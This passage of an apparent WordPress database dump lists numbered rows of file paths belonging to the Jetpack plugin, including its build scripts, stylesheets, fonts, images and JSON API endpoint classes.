orm-button.min.js'),(2832,'wp-content/plugins/jetpack/_inc/build/crowdsignal-shortcode.min.js'),(2833,'wp-content/plugins/jetpack/_inc/build/crowdsignal-survey.min.js'),(2834,'wp-content/plugins/jetpack/_inc/build/custom-css/custom-css/js/core-customizer-css-preview.min.js'),(2835,'wp-content/plugins/jetpack/_inc/build/custom-css/custom-css/js/core-customizer-css.core-4.9.min.js'),(2836,'wp-content/plugins/jetpack/_inc/build/custom-css/custom-css/js/core-customizer-css.min.js'),(2837,'wp-content/plugins/jetpack/_inc/build/custom-css/custom-css/js/css-editor.min.js'),(2838,'wp-content/plugins/jetpack/_inc/build/custom-css/custom-css/js/use-codemirror.min.js'),(2839,'wp-content/plugins/jetpack/_inc/build/custom-post-types/comics/comics.min.js'),(2840,'wp-content/plugins/jetpack/_inc/build/custom-post-types/js/many-items.min.js'),(2841,'wp-content/plugins/jetpack/_inc/build/custom-post-types/js/menu-checkboxes.min.js'),(2842,'wp-content/plugins/jetpack/_inc/build/custom-post-types/js/nova-drag-drop.min.js'),(2843,'wp-content/plugins/jetpack/_inc/build/facebook-embed.min.js'),(2844,'wp-content/plugins/jetpack/_inc/build/gallery-settings.min.js'),(2845,'wp-content/plugins/jetpack/_inc/build/idc-notice.min.js'),(2846,'wp-content/plugins/jetpack/_inc/build/infinite-scroll/infinity.min.js'),(2847,'wp-content/plugins/jetpack/_inc/build/instant-search/instant-search.min.css'),(2848,'wp-content/plugins/jetpack/_inc/build/instant-search/jp-search.bundle.js'),(2849,'wp-content/plugins/jetpack/_inc/build/jetpack-admin.min.js'),(2850,'wp-content/plugins/jetpack/_inc/build/jetpack-connection-banner.min.js'),(2851,'wp-content/plugins/jetpack/_inc/build/jetpack-jitm.min.js'),(2852,'wp-content/plugins/jetpack/_inc/build/jetpack-modules.min.js'),(2853,'wp-content/plugins/jetpack/_inc/build/jetpack-modules.models.min.js'),(2854,'wp-content/plugins/jetpack/_inc/build/jetpack-modules.views.min.js'),(2855,'wp-content/plugins/jetpack/_inc/build/jquery.jetpack-resize.min.js'),(2856,'wp-content/plugins/jetpack/_inc/build/jquery.spin.min.js'),(2857,'wp-content/plugins/jetpack/_inc/build/lazy-images/js/lazy-images.min.js'),(2858,'wp-content/plugins/jetpack/_inc/build/likes/post-count-jetpack.min.js'),(2859,'wp-content/plugins/jetpack/_inc/build/likes/post-count.min.js'),(2860,'wp-content/plugins/jetpack/_inc/build/likes/queuehandler.min.js'),(2861,'wp-content/plugins/jetpack/_inc/build/masterbar/tracks-events.min.js'),(2862,'wp-content/plugins/jetpack/_inc/build/minileven/theme/pub/minileven/js/small-menu.min.js'),(2863,'wp-content/plugins/jetpack/_inc/build/photon/photon.min.js'),(2864,'wp-content/plugins/jetpack/_inc/build/polldaddy-shortcode.min.js'),(2865,'wp-content/plugins/jetpack/_inc/build/postmessage.min.js'),(2866,'wp-content/plugins/jetpack/_inc/build/related-posts/related-posts-customizer.min.js'),(2867,'wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js'),(2868,'wp-content/plugins/jetpack/_inc/build/sharedaddy/admin-sharing.min.js'),(2869,'wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js'),(2870,'wp-content/plugins/jetpack/_inc/build/shortcodes/js/brightcove.min.js'),(2871,'wp-content/plugins/jetpack/_inc/build/shortcodes/js/gist.min.js'),(2872,'wp-content/plugins/jetpack/_inc/build/shortcodes/js/instagram.min.js'),(2873,'wp-content/plugins/jetpack/_inc/build/shortcodes/js/jmpress.min.js'),(2874,'wp-content/plugins/jetpack/_inc/build/shortcodes/js/main.min.js'),(2875,'wp-content/plugins/jetpack/_inc/build/shortcodes/js/quiz.min.js'),(2876,'wp-content/plugins/jetpack/_inc/build/shortcodes/js/recipes-printthis.min.js'),(2877,'wp-content/plugins/jetpack/_inc/build/shortcodes/js/recipes.min.js'),(2878,'wp-content/plugins/jetpack/_inc/build/shortcodes/js/slideshow-shortcode.min.js'),(2879,'wp-content/plugins/jetpack/_inc/build/spin.min.js'),(2880,'wp-content/plugins/jetpack/_inc/build/static-noscript-notice.html'),(2881,'wp-content/plugins/jetpack/_inc/build/static-version-notice.html'),(2882,'wp-content/plugins/jetpack/_inc/build/static.css'),(2883,'wp-content/plugins/jetpack/_inc/build/static.html'),(2884,'wp-content/plugins/jetpack/_inc/build/static.js'),(2885,'wp-content/plugins/jetpack/_inc/build/static.rtl.css'),(2886,'wp-content/plugins/jetpack/_inc/build/style.min.css'),(2887,'wp-content/plugins/jetpack/_inc/build/style.min.rtl.css'),(2888,'wp-content/plugins/jetpack/_inc/build/tiled-gallery/tiled-gallery/tiled-gallery.min.js'),(2889,'wp-content/plugins/jetpack/_inc/build/twitter-timeline.min.js'),(2890,'wp-content/plugins/jetpack/_inc/build/videopress/js/editor-view.min.js'),(2891,'wp-content/plugins/jetpack/_inc/build/videopress/js/media-video-widget-extensions.min.js'),(2892,'wp-content/plugins/jetpack/_inc/build/videopress/js/videopress-plupload.min.js'),(2893,'wp-content/plugins/jetpack/_inc/build/videopress/js/videopress-uploader.min.js'),(2894,'wp-content/plugins/jetpack/_inc/build/widget-visibility/widget-conditions/widget-conditions.min.js'),(2895,'wp-content/plugins/jetpack/_inc/build/widgets/contact-info/contact-info-admin.min.js'),(2896,'wp-content/plugins/jetpack/_inc/build/widgets/customizer-utils.min.js'),(2897,'wp-content/plugins/jetpack/_inc/build/widgets/eu-cookie-law/eu-cookie-law-admin.min.js'),(2898,'wp-content/plugins/jetpack/_inc/build/widgets/eu-cookie-law/eu-cookie-law.min.js'),(2899,'wp-content/plugins/jetpack/_inc/build/widgets/gallery/js/admin.min.js'),(2900,'wp-content/plugins/jetpack/_inc/build/widgets/gallery/js/gallery.min.js'),(2901,'wp-content/plugins/jetpack/_inc/build/widgets/google-translate/google-translate.min.js'),(2902,'wp-content/plugins/jetpack/_inc/build/widgets/milestone/admin.min.js'),(2903,'wp-content/plugins/jetpack/_inc/build/widgets/milestone/milestone.min.js'),(2904,'wp-content/plugins/jetpack/_inc/build/widgets/search/js/search-widget-admin.min.js'),(2905,'wp-content/plugins/jetpack/_inc/build/widgets/search/js/search-widget.min.js'),(2906,'wp-content/plugins/jetpack/_inc/build/widgets/simple-payments/customizer.min.js'),(2907,'wp-content/plugins/jetpack/_inc/build/widgets/social-icons/social-icons-admin.min.js'),(2908,'wp-content/plugins/jetpack/_inc/build/widgets/twitter-timeline-admin.min.js'),(2909,'wp-content/plugins/jetpack/_inc/class.jetpack-provision.php'),(2910,'wp-content/plugins/jetpack/_inc/connect-button.js'),(2911,'wp-content/plugins/jetpack/_inc/crowdsignal-shortcode.js'),(2912,'wp-content/plugins/jetpack/_inc/crowdsignal-survey.js'),(2913,'wp-content/plugins/jetpack/_inc/facebook-embed.js'),(2914,'wp-content/plugins/jetpack/_inc/fonts/automatticons/automatticons.eot'),(2915,'wp-content/plugins/jetpack/_inc/fonts/automatticons/automatticons.svg'),(2916,'wp-content/plugins/jetpack/_inc/fonts/automatticons/automatticons.ttf'),(2917,'wp-content/plugins/jetpack/_inc/fonts/automatticons/automatticons.woff'),(2918,'wp-content/plugins/jetpack/_inc/fonts/jetpack/jetpack.eot'),(2919,'wp-content/plugins/jetpack/_inc/fonts/jetpack/jetpack.svg'),(2920,'wp-content/plugins/jetpack/_inc/fonts/jetpack/jetpack.ttf'),(2921,'wp-content/plugins/jetpack/_inc/fonts/jetpack/jetpack.woff'),(2922,'wp-content/plugins/jetpack/_inc/footer.php'),(2923,'wp-content/plugins/jetpack/_inc/gallery-settings.js'),(2924,'wp-content/plugins/jetpack/_inc/genericons/COPYING.txt'),(2925,'wp-content/plugins/jetpack/_inc/genericons/LICENSE.txt'),(2926,'wp-content/plugins/jetpack/_inc/genericons/README.md'),(2927,'wp-content/plugins/jetpack/_inc/genericons/genericons/Genericons.eot'),(2928,'wp-content/plugins/jetpack/_inc/genericons/genericons/Genericons.svg'),(2929,'wp-content/plugins/jetpack/_inc/genericons/genericons/Genericons.ttf'),(2930,'wp-content/plugins/jetpack/_inc/genericons/genericons/Genericons.woff'),(2931,'wp-content/plugins/jetpack/_inc/genericons/genericons/genericons.css'),(2932,'wp-content/plugins/jetpack/_inc/genericons/genericons/rtl/genericons-rtl.css'),(2933,'wp-content/plugins/jetpack/_inc/genericons/genericons.css'),(2934,'wp-content/plugins/jetpack/_inc/genericons.php'),(2935,'wp-content/plugins/jetpack/_inc/header.php'),(2936,'wp-content/plugins/jetpack/_inc/idc-notice.js'),(2937,'wp-content/plugins/jetpack/_inc/jetpack-admin.js'),(2938,'wp-content/plugins/jetpack/_inc/jetpack-connection-banner.js'),(2939,'wp-content/plugins/jetpack/_inc/jetpack-jitm.js'),(2940,'wp-content/plugins/jetpack/_inc/jetpack-modules.js'),(2941,'wp-content/plugins/jetpack/_inc/jetpack-modules.models.js'),(2942,'wp-content/plugins/jetpack/_inc/jetpack-modules.views.js'),(2943,'wp-content/plugins/jetpack/_inc/jetpack-server-sandbox.php'),(2944,'wp-content/plugins/jetpack/_inc/jetpack-strings.php'),(2945,'wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js'),(2946,'wp-content/plugins/jetpack/_inc/jquery.spin.js'),(2947,'wp-content/plugins/jetpack/_inc/lib/admin-pages/class-jetpack-about-page.php'),(2948,'wp-content/plugins/jetpack/_inc/lib/admin-pages/class.jetpack-admin-page.php'),(2949,'wp-content/plugins/jetpack/_inc/lib/admin-pages/class.jetpack-landing-page.php'),(2950,'wp-content/plugins/jetpack/_inc/lib/admin-pages/class.jetpack-react-page.php'),(2951,'wp-content/plugins/jetpack/_inc/lib/admin-pages/class.jetpack-settings-page.php'),(2952,'wp-content/plugins/jetpack/_inc/lib/class.color.php'),(2953,'wp-content/plugins/jetpack/_inc/lib/class.core-rest-api-endpoints.php'),(2954,'wp-content/plugins/jetpack/_inc/lib/class.jetpack-automatic-install-skin.php'),(2955,'wp-content/plugins/jetpack/_inc/lib/class.jetpack-iframe-embed.php'),(2956,'wp-content/plugins/jetpack/_inc/lib/class.jetpack-keyring-service-helper.php'),(2957,'wp-content/plugins/jetpack/_inc/lib/class.jetpack-password-checker.php'),(2958,'wp-content/plugins/jetpack/_inc/lib/class.jetpack-photon-image-sizes.php'),(2959,'wp-content/plugins/jetpack/_inc/lib/class.jetpack-photon-image.php'),(2960,'wp-content/plugins/jetpack/_inc/lib/class.jetpack-search-performance-logger.php'),(2961,'wp-content/plugins/jetpack/_inc/lib/class.media-extractor.php'),(2962,'wp-content/plugins/jetpack/_inc/lib/class.media-summary.php'),(2963,'wp-content/plugins/jetpack/_inc/lib/class.media.php'),(2964,'wp-content/plugins/jetpack/_inc/lib/components.php'),(2965,'wp-content/plugins/jetpack/_inc/lib/core-api/class-wpcom-rest-field-controller.php'),(2966,'wp-content/plugins/jetpack/_inc/lib/core-api/class.jetpack-core-api-module-endpoints.php'),(2967,'wp-content/plugins/jetpack/_inc/lib/core-api/class.jetpack-core-api-site-endpoints.php'),(2968,'wp-content/plugins/jetpack/_inc/lib/core-api/class.jetpack-core-api-widgets-endpoints.php'),(2969,'wp-content/plugins/jetpack/_inc/lib/core-api/class.jetpack-core-api-xmlrpc-consumer-endpoint.php'),(2970,'wp-content/plugins/jetpack/_inc/lib/core-api/load-wpcom-endpoints.php'),(2971,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/business-hours.php'),(2972,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/class-wpcom-rest-api-v2-endpoint-mailchimp.php'),(2973,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/gutenberg-available-extensions.php'),(2974,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/hello.php'),(2975,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/memberships.php'),(2976,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/publicize-connection-test-results.php'),(2977,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/publicize-connections.php'),(2978,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/publicize-services.php'),(2979,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/service-api-keys.php'),(2980,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/sites-posts-featured-media-url.php'),(2981,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-endpoints/subscribers.php'),(2982,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-fields/attachment-fields-videopress.php'),(2983,'wp-content/plugins/jetpack/_inc/lib/core-api/wpcom-fields/post-fields-publicize-connections.php'),(2984,'wp-content/plugins/jetpack/_inc/lib/debugger/0-load.php'),(2985,'wp-content/plugins/jetpack/_inc/lib/debugger/class-jetpack-cxn-test-base.php'),(2986,'wp-content/plugins/jetpack/_inc/lib/debugger/class-jetpack-cxn-tests.php'),(2987,'wp-content/plugins/jetpack/_inc/lib/debugger/class-jetpack-debug-data.php'),(2988,'wp-content/plugins/jetpack/_inc/lib/debugger/class-jetpack-debugger.php'),(2989,'wp-content/plugins/jetpack/_inc/lib/debugger/debug-functions-for-php53.php'),(2990,'wp-content/plugins/jetpack/_inc/lib/functions.wp-notify.php'),(2991,'wp-content/plugins/jetpack/_inc/lib/icalendar-reader.php'),(2992,'wp-content/plugins/jetpack/_inc/lib/jetpack-wpes-query-builder/jetpack-wpes-query-builder.php'),(2993,'wp-content/plugins/jetpack/_inc/lib/jetpack-wpes-query-builder/jetpack-wpes-query-parser.php'),(2994,'wp-content/plugins/jetpack/_inc/lib/markdown/0-load.php'),(2995,'wp-content/plugins/jetpack/_inc/lib/markdown/README.md'),(2996,'wp-content/plugins/jetpack/_inc/lib/markdown/extra.php'),(2997,'wp-content/plugins/jetpack/_inc/lib/markdown/gfm.php'),(2998,'wp-content/plugins/jetpack/_inc/lib/plans.php'),(2999,'wp-content/plugins/jetpack/_inc/lib/plugins.php'),(3000,'wp-content/plugins/jetpack/_inc/lib/tonesque.php'),(3001,'wp-content/plugins/jetpack/_inc/lib/tracks/class.tracks-client.php'),(3002,'wp-content/plugins/jetpack/_inc/lib/tracks/class.tracks-event.php'),(3003,'wp-content/plugins/jetpack/_inc/lib/tracks/client.php'),(3004,'wp-content/plugins/jetpack/_inc/lib/tracks/tracks-ajax.js'),(3005,'wp-content/plugins/jetpack/_inc/lib/tracks/tracks-callables.js'),(3006,'wp-content/plugins/jetpack/_inc/lib/widgets.php'),(3007,'wp-content/plugins/jetpack/_inc/polldaddy-shortcode.js'),(3008,'wp-content/plugins/jetpack/_inc/postmessage.js'),(3009,'wp-content/plugins/jetpack/_inc/social-logos/social-logos.css'),(3010,'wp-content/plugins/jetpack/_inc/social-logos/social-logos.eot'),(3011,'wp-content/plugins/jetpack/_inc/social-logos/social-logos.html'),(3012,'wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css'),(3013,'wp-content/plugins/jetpack/_inc/social-logos/social-logos.ttf'),(3014,'wp-content/plugins/jetpack/_inc/social-logos/social-logos.woff'),(3015,'wp-content/plugins/jetpack/_inc/social-logos/social-logos.woff2'),(3016,'wp-content/plugins/jetpack/_inc/social-logos.php'),(3017,'wp-content/plugins/jetpack/_inc/spin.js'),(3018,'wp-content/plugins/jetpack/_inc/twitter-timeline.js'),(3019,'wp-content/plugins/jetpack/bin/build-asset-cdn-json.php'),(3020,'wp-content/plugins/jetpack/bin/partner-cancel.sh'),(3021,'wp-content/plugins/jetpack/bin/partner-provision.sh'),(3022,'wp-content/plugins/jetpack/changelog.txt'),(3023,'wp-content/plugins/jetpack/class.frame-nonce-preview.php'),(3024,'wp-content/plugins/jetpack/class.jetpack-admin.php'),(3025,'wp-content/plugins/jetpack/class.jetpack-affiliate.php'),(3026,'wp-content/plugins/jetpack/class.jetpack-autoupdate.php'),(3027,'wp-content/plugins/jetpack/class.jetpack-bbpress-json-api-compat.php'),(3028,'wp-content/plugins/jetpack/class.jetpack-cli.php'),(3029,'wp-content/plugins/jetpack/class.jetpack-client-server.php'),(3030,'wp-content/plugins/jetpack/class.jetpack-client.php'),(3031,'wp-content/plugins/jetpack/class.jetpack-connection-banner.php'),(3032,'wp-content/plugins/jetpack/class.jetpack-constants.php'),(3033,'wp-content/plugins/jetpack/class.jetpack-data.php'),(3034,'wp-content/plugins/jetpack/class.jetpack-debugger.php'),(3035,'wp-content/plugins/jetpack/class.jetpack-error.php'),(3036,'wp-content/plugins/jetpack/class.jetpack-gutenberg.php'),(3037,'wp-content/plugins/jetpack/class.jetpack-heartbeat.php'),(3038,'wp-content/plugins/jetpack/class.jetpack-idc.php'),(3039,'wp-content/plugins/jetpack/class.jetpack-ixr-client.php'),(3040,'wp-content/plugins/jetpack/class.jetpack-jitm.php'),(3041,'wp-content/plugins/jetpack/class.jetpack-modules-list-table.php'),(3042,'wp-content/plugins/jetpack/class.jetpack-network-sites-list-table.php'),(3043,'wp-content/plugins/jetpack/class.jetpack-network.php'),(3044,'wp-content/plugins/jetpack/class.jetpack-options.php'),(3045,'wp-content/plugins/jetpack/class.jetpack-plan.php'),(3046,'wp-content/plugins/jetpack/class.jetpack-post-images.php'),(3047,'wp-content/plugins/jetpack/class.jetpack-signature.php'),(3048,'wp-content/plugins/jetpack/class.jetpack-tracks.php'),(3049,'wp-content/plugins/jetpack/class.jetpack-twitter-cards.php'),(3050,'wp-content/plugins/jetpack/class.jetpack-user-agent.php'),(3051,'wp-content/plugins/jetpack/class.jetpack-xmlrpc-server.php'),(3052,'wp-content/plugins/jetpack/class.jetpack.php'),(3053,'wp-content/plugins/jetpack/class.json-api-endpoints.php'),(3054,'wp-content/plugins/jetpack/class.json-api.php'),(3055,'wp-content/plugins/jetpack/class.photon.php'),(3056,'wp-content/plugins/jetpack/composer.json'),(3057,'wp-content/plugins/jetpack/css/dashboard-widget-rtl.css'),(3058,'wp-content/plugins/jetpack/css/dashboard-widget-rtl.css.min.map'),(3059,'wp-content/plugins/jetpack/css/dashboard-widget-rtl.min.css'),(3060,'wp-content/plugins/jetpack/css/dashboard-widget.css'),(3061,'wp-content/plugins/jetpack/css/dashboard-widget.css.min.map'),(3062,'wp-content/plugins/jetpack/css/dashboard-widget.min.css'),(3063,'wp-content/plugins/jetpack/css/jetpack-admin-rtl.css'),(3064,'wp-content/plugins/jetpack/css/jetpack-admin-rtl.css.min.map'),(3065,'wp-content/plugins/jetpack/css/jetpack-admin-rtl.min.css'),(3066,'wp-content/plugins/jetpack/css/jetpack-admin.css'),(3067,'wp-content/plugins/jetpack/css/jetpack-admin.css.min.map'),(3068,'wp-content/plugins/jetpack/css/jetpack-admin.min.css'),(3069,'wp-content/plugins/jetpack/css/jetpack-banners-rtl.css'),(3070,'wp-content/plugins/jetpack/css/jetpack-banners-rtl.css.min.map'),(3071,'wp-content/plugins/jetpack/css/jetpack-banners-rtl.min.css'),(3072,'wp-content/plugins/jetpack/css/jetpack-banners.css'),(3073,'wp-content/plugins/jetpack/css/jetpack-banners.css.min.map'),(3074,'wp-content/plugins/jetpack/css/jetpack-banners.min.css'),(3075,'wp-content/plugins/jetpack/css/jetpack-connect-rtl.css'),(3076,'wp-content/plugins/jetpack/css/jetpack-connect-rtl.min.css'),(3077,'wp-content/plugins/jetpack/css/jetpack-connect.css'),(3078,'wp-content/plugins/jetpack/css/jetpack-connect.min.css'),(3079,'wp-content/plugins/jetpack/css/jetpack-icons-rtl.css'),(3080,'wp-content/plugins/jetpack/css/jetpack-icons-rtl.css.min.map'),(3081,'wp-content/plugins/jetpack/css/jetpack-icons-rtl.min.css'),(3082,'wp-content/plugins/jetpack/css/jetpack-icons.css'),(3083,'wp-content/plugins/jetpack/css/jetpack-icons.css.min.map'),(3084,'wp-content/plugins/jetpack/css/jetpack-icons.min.css'),(3085,'wp-content/plugins/jetpack/css/jetpack-idc-admin-bar-rtl.css'),(3086,'wp-content/plugins/jetpack/css/jetpack-idc-admin-bar-rtl.css.min.map'),(3087,'wp-content/plugins/jetpack/css/jetpack-idc-admin-bar-rtl.min.css'),(3088,'wp-content/plugins/jetpack/css/jetpack-idc-admin-bar.css'),(3089,'wp-content/plugins/jetpack/css/jetpack-idc-admin-bar.css.min.map'),(3090,'wp-content/plugins/jetpack/css/jetpack-idc-admin-bar.min.css'),(3091,'wp-content/plugins/jetpack/css/jetpack-idc-rtl.css'),(3092,'wp-content/plugins/jetpack/css/jetpack-idc-rtl.css.min.map'),(3093,'wp-content/plugins/jetpack/css/jetpack-idc-rtl.min.css'),(3094,'wp-content/plugins/jetpack/css/jetpack-idc.css'),(3095,'wp-content/plugins/jetpack/css/jetpack-idc.css.min.map'),(3096,'wp-content/plugins/jetpack/css/jetpack-idc.min.css'),(3097,'wp-content/plugins/jetpack/css/jetpack-rtl.css'),(3098,'wp-content/plugins/jetpack/css/jetpack.css'),(3099,'wp-content/plugins/jetpack/extensions/blocks/business-hours/business-hours.php'),(3100,'wp-content/plugins/jetpack/extensions/blocks/contact-info/class-jetpack-contact-info-block.php'),(3101,'wp-content/plugins/jetpack/extensions/blocks/contact-info/contact-info.php'),(3102,'wp-content/plugins/jetpack/extensions/blocks/gif/gif.php'),(3103,'wp-content/plugins/jetpack/extensions/blocks/mailchimp/mailchimp.php'),(3104,'wp-content/plugins/jetpack/extensions/blocks/map/map.php'),(3105,'wp-content/plugins/jetpack/extensions/blocks/markdown/markdown.php'),(3106,'wp-content/plugins/jetpack/extensions/blocks/markdown/test/__snapshots__/markdown-renderer.js.snap'),(3107,'wp-content/plugins/jetpack/extensions/blocks/recurring-payments/recurring-payments.php'),(3108,'wp-content/plugins/jetpack/extensions/blocks/repeat-visitor/repeat-visitor.php'),(3109,'wp-content/plugins/jetpack/extensions/blocks/slideshow/slideshow.php'),(3110,'wp-content/plugins/jetpack/extensions/blocks/tiled-gallery/layout/mosaic/test/__snapshots__/index.js.snap'),(3111,'wp-content/plugins/jetpack/extensions/blocks/tiled-gallery/layout/mosaic/test/__snapshots__/ratios.js.snap'),(3112,'wp-content/plugins/jetpack/extensions/blocks/tiled-gallery/tiled-gallery.php'),(3113,'wp-content/plugins/jetpack/extensions/blocks/wordads/wordads.php'),(3114,'wp-content/plugins/jetpack/functions.compat.php'),(3115,'wp-content/plugins/jetpack/functions.gallery.php'),(3116,'wp-content/plugins/jetpack/functions.global.php'),(3117,'wp-content/plugins/jetpack/functions.opengraph.php'),(3118,'wp-content/plugins/jetpack/functions.photon.php'),(3119,'wp-content/plugins/jetpack/images/apps/triple-devices.svg'),(3120,'wp-content/plugins/jetpack/images/apps.svg'),(3121,'wp-content/plugins/jetpack/images/block-picker.png'),(3122,'wp-content/plugins/jetpack/images/cf-ss.png'),(3123,'wp-content/plugins/jetpack/images/characters.svg'),(3124,'wp-content/plugins/jetpack/images/cloud-based.svg'),(3125,'wp-content/plugins/jetpack/images/connect-jetpack.svg'),(3126,'wp-content/plugins/jetpack/images/connect-plug.svg'),(3127,'wp-content/plugins/jetpack/images/customize-theme-2.svg'),(3128,'wp-content/plugins/jetpack/images/customize-theme.svg'),(3129,'wp-content/plugins/jetpack/images/generating-cash-2.svg'),(3130,'wp-content/plugins/jetpack/images/get-apps.svg'),(3131,'wp-content/plugins/jetpack/images/jetpack-design.svg'),(3132,'wp-content/plugins/jetpack/images/jetpack-google-analytics.svg'),(3133,'wp-content/plugins/jetpack/images/jetpack-gutenberg.svg'),(3134,'wp-content/plugins/jetpack/images/jetpack-icon.jpg'),(3135,'wp-content/plugins/jetpack/images/jetpack-logo.png'),(3136,'wp-content/plugins/jetpack/images/jetpack-logo.svg'),(3137,'wp-content/plugins/jetpack/images/jetpack-marketing.svg'),(3138,'wp-content/plugins/jetpack/images/jetpack-performance-icon.svg'),(3139,'wp-content/plugins/jetpack/images/jetpack-performance.svg'),(3140,'wp-content/plugins/jetpack/images/jetpack-powering-up.svg'),(3141,'wp-content/plugins/jetpack/images/jetpack-search-icon.svg'),(3142,'wp-content/plugins/jetpack/images/jetpack-search.svg'),(3143,'wp-content/plugins/jetpack/images/jetpack-security.svg'),(3144,'wp-content/plugins/jetpack/images/jetpack-site-activity.svg'),(3145,'wp-content/plugins/jetpack/images/jetpack-spam.svg'),(3146,'wp-content/plugins/jetpack/images/jetpack-speed-icon.svg'),(3147,'wp-content/plugins/jetpack/images/jetpack-speed.svg'),(3148,'wp-content/plugins/jetpack/images/jetpack-support.svg'),(3149,'wp-content/plugins/jetpack/images/jetpack-themes.svg'),(3150,'wp-content/plugins/jetpack/images/jetpack-updates.svg'),(3151,'wp-content/plugins/jetpack/images/jetpack-video-hosting.svg'),(3152,'wp-content/plugins/jetpack/images/jetpack-welcome.svg'),(3153,'wp-content/plugins/jetpack/images/jetpack-wordads.svg'),(3154,'wp-content/plugins/jetpack/images/jupiter.svg'),(3155,'wp-content/plugins/jetpack/images/man-and-laptop.svg'),(3156,'wp-content/plugins/jetpack/images/people-around-page.svg'),(3157,'wp-content/plugins/jetpack/images/plans/plan-business.svg'),(3158,'wp-content/plugins/jetpack/images/plans/plan-free.svg'),(3159,'wp-content/plugins/jetpack/images/plans/plan-personal.svg'),(3160,'wp-content/plugins/jetpack/images/plans/plan-premium.svg'),(3161,'wp-content/plugins/jetpack/images/rss/blue-large.png'),(3162,'wp-content/plugins/jetpack/images/rss/blue-medium.png'),(3163,'wp-content/plugins/jetpack/images/rss/blue-small.png'),(3164,'wp-content/plugins/jetpack/images/rss/green-large.png'),(3165,'wp-content/plugins/jetpack/images/rss/green-medium.png'),(3166,'wp-content/plugins/jetpack/images/rss/green-small.png'),(3167,'wp-content/plugins/jetpack/images/rss/orange-large.png'),(3168,'wp-content/plugins/jetpack/images/rss/orange-medium.png'),(3169,'wp-content/plugins/jetpack/images/rss/orange-small.png'),(3170,'wp-content/plugins/jetpack/images/rss/pink-large.png'),(3171,'wp-content/plugins/jetpack/images/rss/pink-medium.png'),(3172,'wp-content/plugins/jetpack/images/rss/pink-small.png'),(3173,'wp-content/plugins/jetpack/images/rss/purple-large.png'),(3174,'wp-content/plugins/jetpack/images/rss/purple-medium.png'),(3175,'wp-content/plugins/jetpack/images/rss/purple-small.png'),(3176,'wp-content/plugins/jetpack/images/rss/red-large.png'),(3177,'wp-content/plugins/jetpack/images/rss/red-medium.png'),(3178,'wp-content/plugins/jetpack/images/rss/red-small.png'),(3179,'wp-content/plugins/jetpack/images/rss/silver-large.png'),(3180,'wp-content/plugins/jetpack/images/rss/silver-medium.png'),(3181,'wp-content/plugins/jetpack/images/rss/silver-small.png'),(3182,'wp-content/plugins/jetpack/images/security.svg'),(3183,'wp-content/plugins/jetpack/images/stars-full.svg'),(3184,'wp-content/plugins/jetpack/images/stars-left.svg'),(3185,'wp-content/plugins/jetpack/images/stars-right.svg'),(3186,'wp-content/plugins/jetpack/images/stats-example-lrg.png'),(3187,'wp-content/plugins/jetpack/images/stats-example-med.png'),(3188,'wp-content/plugins/jetpack/images/stats-example-sm.png'),(3189,'wp-content/plugins/jetpack/images/stats-people.svg'),(3190,'wp-content/plugins/jetpack/images/stats-smiley.gif'),(3191,'wp-content/plugins/jetpack/images/stats.svg'),(3192,'wp-content/plugins/jetpack/images/themes.svg'),(3193,'wp-content/plugins/jetpack/images/white-clouds-reverse.svg'),(3194,'wp-content/plugins/jetpack/images/white-clouds.svg'),(3195,'wp-content/plugins/jetpack/images/wordads.svg'),(3196,'wp-content/plugins/jetpack/jest.config.js'),(3197,'wp-content/plugins/jetpack/jetpack.php'),(3198,'wp-content/plugins/jetpack/json-api-config.php'),(3199,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-add-widget-endpoint.php'),(3200,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-autosave-post-v1-1-endpoint.php'),(3201,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-bulk-delete-post-endpoint.php'),(3202,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-bulk-restore-post-endpoint.php'),(3203,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-bulk-update-comments-endpoint.php'),(3204,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-comment-endpoint.php'),(3205,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-delete-media-endpoint.php'),(3206,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-delete-media-v1-1-endpoint.php'),(3207,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-edit-media-v1-2-endpoint.php'),(3208,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-autosave-v1-1-endpoint.php'),(3209,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-comment-counts-endpoint.php'),(3210,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-comment-endpoint.php'),(3211,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-comment-history-endpoint.php'),(3212,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-comments-tree-endpoint.php'),(3213,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-comments-tree-v1-1-endpoint.php'),(3214,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-comments-tree-v1-2-endpoint.php'),(3215,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-customcss.php'),(3216,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-media-endpoint.php'),(3217,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-media-v1-1-endpoint.php'),(3218,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-media-v1-2-endpoint.php'),(3219,'wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-get-post-counts-v1-1-endpoint.php'),(